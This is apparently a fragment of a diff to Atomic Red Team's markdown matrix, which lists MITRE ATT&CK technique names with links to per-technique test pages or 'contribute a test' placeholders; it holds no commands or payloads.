| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
|
||||
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Authentication Package](../../T1547.002/T1547.002.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
|
||||
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
|
||||
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [BITS Jobs](../../T1197/T1197.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
|
||||
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
|
||||
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | | | | | | | |
|
||||
| | | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) | | | | | | | |
|
||||
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
|
||||
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
|
||||
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
|
||||
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | vSphere Installation Bundles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
|
||||
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Disable or Modify Network Device Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
|
||||
@@ -134,6 +137,7 @@
|
||||
| | | | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
|
||||
| | | | | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
|
||||
|
||||
@@ -12,98 +12,101 @@
|
||||
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Video Capture](../../T1125/T1125.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
